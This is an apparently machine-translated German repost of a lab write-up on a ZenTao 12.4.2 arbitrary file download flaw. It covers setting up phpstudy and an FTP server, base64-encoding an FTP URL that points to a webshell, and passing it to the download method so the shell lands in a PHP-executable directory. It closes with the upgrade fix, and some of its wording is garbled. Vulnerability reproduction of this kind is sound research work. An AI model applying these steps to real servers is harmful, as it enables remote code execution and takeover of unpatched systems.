Heim >Betrieb und Instandhaltung >Sicherheit >Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

WBOY
WBOYnach vorne
2023-05-16 15:43:121613Durchsuche

0x00Einführung

ZenTao ist eine professionelle inländische Open-Source-F&E-Projektmanagementsoftware, die Produktmanagement, Projektmanagement, Qualitätsmanagement, Dokumentenmanagement, Organisationsmanagement und Transaktionsmanagement integriert und die Kernprozesse von F&E-Projekten vollständig abdeckt Management. Die Managementidee basiert auf der international beliebten agilen Projektmanagementmethode Scrum. Basierend auf deren Werten und der Kombination des aktuellen Stands der inländischen Projektforschung und -entwicklung integriert sie mehrere Funktionen wie Aufgabenmanagement, Bedarfsmanagement und Bug Management, Use-Case-Management usw. und deckt die Software von der Planung bis zum gesamten Lebenszyklus einer Version ab.

0x01 Schwachstellenübersicht

In ZenTao Version 12.4.2 besteht eine Schwachstelle beim Herunterladen willkürlicher Dateien. Diese Schwachstelle liegt daran, dass die Filterung in der Download-Methode in der Client-Klasse nicht streng ist und FTP zum Herunterladen von Dateien verwendet werden kann. Und das heruntergeladene Dateispeicherverzeichnis kann PHP-Dateien analysieren, was zu Getshell führt.

0x02 betroffene Version

ZenTao ≤ 12.4.2

0x03 Umgebungskonstruktion

phpstudy2018 + ZenTao 12.4.2 ZenTao offizielle Download-Adresse:

https://www.zentao.net/dynamic. /zenta opms12. 4.2-80263.html

3.1. Nach dem Herunterladen in phpstudy einfügen und installieren

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.2. Wenn eine Erweiterung fehlgeschlagen ist, öffnen Sie sie einfach in phpstudy.

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.3. Legen Sie die Datenbankinformationen fest, stellen Sie sie hier auf Ihre eigene Datenbankkonfiguration ein.

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.4. Richten Sie das Konto ein und die Installation ist abgeschlossen

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.4. Verwenden Sie die Umgebung, um den FTP-Dienst zu erstellen. Fügen Sie am Beispiel von Windows2008R2 die Rolle hinzu und fügen Sie FTP

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.5 hinzu.

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.6. Konfigurieren Sie entsprechend Ihrer eigenen Situation. Der nächste Schritt ist

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

3.7. Legen Sie eine Webshell im FTP-Verzeichnis ab und prüfen Sie dann, ob auf FTP zugegriffen werden kann Normalerweise

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

0x04-Schwachstellenwiederkehr

1. Fügen Sie zuerst den Pfad von FTP zur Shell für die Base64-Codierung hinzu

Vor der Verschlüsselung: ftp://192.168.3.200/shell.php

Nach der Verschlüsselung: ZnRwJTNBLy8xOTI uMTY4LjMuMjAwL3NoZWxsLnBocA==

2.Verwenden Sie EXP, fügen Sie das verschlüsselte Base64 in das Verzeichnis ;- 1.html

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?3. Verwenden Sie den folgenden Linkpfad, um zu testen, ob die Shell auf den Server heruntergeladen wurde

http://192.168.3.200/zentaopms/www/data/client/1 /shell.php

Was sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?

0x05 Reparaturmethode

1. Upgrade auf ZenTao 12.4.3 und spätere Versionen

Das obige ist der detaillierte Inhalt vonWas sind die Hintergrundadministratorrechte von Getshell in ZenTao 12.4.2?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:yisu.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen
Vorheriger Artikel:So beheben Sie Ulimit-FehlerNächster Artikel:So beheben Sie Ulimit-Fehler